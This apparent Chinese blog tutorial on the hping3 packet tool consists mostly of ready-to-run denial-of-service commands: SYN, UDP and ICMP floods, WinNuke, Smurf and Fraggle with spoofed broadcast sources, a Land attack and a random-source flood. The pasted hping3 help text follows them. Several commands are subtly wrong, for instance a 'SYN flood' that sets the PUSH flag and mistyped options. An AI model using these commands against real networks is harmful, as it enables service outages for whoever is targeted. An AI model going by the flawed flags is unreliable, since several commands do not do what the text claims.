菜鸟kali实战之hping3

本文主要是介绍菜鸟kali实战之hping3，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

Hping百度百科
Hping是一个命令行下使用的TCP/IP数据包组装/分析工具，其命令模式很像Unix下的ping命令，但是它不是只能发送ICMP回应请求，它还可以支持TCP、UDP、ICMP和RAW-IP协议，它有一个路由跟踪模式，能够在两个相互包含的通道之间传送文件。Hping常被用于检测网络和主机，其功能非常强大，可在多种操作系统下运行，如Linux，FreeBSD，NetBSD，OpenBSD，Solaris，MacOs X，Windows。

DOS攻击
1.tcp syn flood 攻击
sudo hping3 192.168.200.1 -p 631 -P --flood
2.udp flood 攻击
sudo hping3 192.168.200.1 -p 631 -S --flood -2
3.icmp flood 攻击
sudo hping3 192.168.200.1 -p 631 -S --flood -1
4.winnuke 攻击
sudo hping3 -U 192.168.200.1 -p 139
注意事项: winnuke攻击的端口不仅是139端口，还有“138、137、 113、 53”等端口，
因此在测试时要注意将所有端口都覆盖到,关键一点是winnuke攻击特征为“flag=URG”，
因此不能以端口为特征来检测。
5.smurf 攻击
hping3 -1 -a 192.168.0.1 192.168.0.255
一个简单的Smurf攻击原理就是：通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行。最终导致该网络的所有主机都对此ICMP应答请求作出答复，导致网络阻塞。它比ping of death洪水的流量高出1或2个数量级。更加复杂的Smurf将源地址改为第三方的受害者，最终导致第三方崩溃。
第二种为复杂点的攻击，即伪装成被攻击的地址发送信息到被攻击地址的广播地址,如:
#hping3 -1 -a 192.168.0.1 192.168.0.255
Fraggle攻击即由smurf的ICMP协议的攻击改为由UDP协议的攻击，因此只需要修改一
个参数即可，将“-1”改为“-2”(我们UTM实现的是典型端口7模式，即: hping3 -2 192.168.0.255 -D 7)
6. land攻击
sudo hping3 -S -a 192.168.200.1 -p 3389(监听中的端口号) 192.168.200.1
注意: Land 攻击即是伪装成被攻击地址发送请求信息给被攻击地址本身

sudo hping3 -S -P 135 – flood -V --rand- source 192.168.1.1
以下是hing3参数，本文只演示了一些自己用过的。后续用到的将持续更新
hping3 --help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
–fast alias for -i u10000 (10 packets for second)
–faster alias for -i u1000 (100 packets for second)
–flood sent packets as fast as possible. Don’t show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
–beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
–rand-dest random destionation address mode. see the man.
–rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don’t fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
–lsrr loose source routing and record route
–ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
–force-icmp send all icmp types (default send only supported types)
–icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
–icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
–icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
–icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you’ll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
–tcpexitcode use last tcp->th_flags as exit code
–tcp-mss enable the TCP MSS option with the given value
–tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add ‘signature’
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable ‘safe’ protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
–tr-stop Exit when receive the first not ICMP in traceroute mode
–tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
–tr-no-rtt Don’t calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
–apd-send Send the packet described with APD (see docs/APD.txt)